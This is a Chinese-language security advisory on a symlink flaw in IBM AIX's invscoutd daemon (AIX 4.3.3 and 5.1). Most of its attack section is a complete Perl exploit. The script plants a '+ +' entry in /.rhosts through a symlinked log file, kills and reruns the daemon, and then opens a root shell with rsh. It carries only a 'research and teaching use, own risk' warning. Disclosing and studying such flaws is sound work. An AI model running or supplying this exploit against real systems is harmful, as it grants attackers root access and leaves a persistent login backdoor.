安全研究

安全漏洞
AIX Invscoutd符号连接漏洞

发布日期:2004-03-26
更新日期:2004-03-31

受影响系统:
IBM AIX 5.1L
IBM AIX 5.1
IBM AIX 4.3.3
描述:
BUGTRAQ  ID: 9982

IBM AIX是一款商业性质UNIX操作系统。

AIX invscoutd不安全建立临时文件,本地攻击者可以利用这个漏洞提升权限。

AIX invscoutd由于设计错误,允许用户指定一个日志文件来写入数据,恶意用户可以建议一个指向本地系统文件的符号连接,当运行invscoutd写入日志信息时,可破坏指向的本地文件,造成本地拒绝服务,或权限提升。

<*来源:watercloud (watercloud@xfocus.org
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

watercloud (watercloud@xfocus.org)提供了如下测试方法:

#!/usr/bin/perl
# FileName: x_invscoutd.pl
# Exploit invscoutd of Aix4.x & 5L to get a uid=0 shell.
# Tested  : on Aix4.3.3 & Aix5.1.
#           Some high version of invscoutd is not affected.
# Author  : watercloud@xfocus.org
# Site    : www.xfocus.org   www.xfocus.net
# Date    : 2003-5-29
# Announce: use as your owner risk!

$LOG="/tmp/.ex/.hello\n+ +\nworld";
$CMD="/usr/sbin/invscoutd";
umask 022;
mkdir "/tmp/.ex",0777;

print "Exploit error on kill process invscoutd !!" ,exit 1
  if &killproc() == 0;

symlink "/.rhosts",$LOG;
system $CMD,"-p7321",$LOG; &killproc();
unlink $LOG;
print "\n============\nRemember to remove /.rhosts !!\n";
print "rsh localhost -l root '/bin/sh -i'\n";
print "waiting . . . . . .\n";
system "rsh","localhost","-l","root","/bin/sh -i";

system $CMD,"-p808","/dev/null" ; &killproc();
rmdir "/tmp/.ex";

sub killproc() {
  $_=`ps -ef |grep invscoutd |grep -v grep |grep -v perl`;
  @proc_lst=split;
  $ret=kill 9,$proc_lst[1] if $proc_lst[1];
  $ret=-1 if ! defined $ret;
  return $ret;
}
#EOF

建议:
厂商补丁:

IBM
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.ers.ibm.com/

浏览次数:3226
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障